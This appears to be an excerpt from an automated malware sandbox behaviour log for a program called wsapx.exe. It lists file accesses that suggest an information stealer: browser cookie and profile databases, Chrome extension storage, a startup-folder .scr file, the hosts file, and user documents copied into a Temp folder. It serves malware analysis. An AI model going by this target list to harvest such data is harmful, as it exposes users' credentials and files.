              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73722 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\wsapx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\NVWZAPQSQL.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PIVFAGEAAV.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\PWCCAWLGRE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QCFWYSKMHA.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ZQIXMVQGAH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Documents\BJZFPPWAPT.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Documents\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Documents\BNAGMGSPLO.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeQueries volume information: C:\Users\user\Documents\EOWRVPQCCS.mp3 VolumeInformationJump to behavior
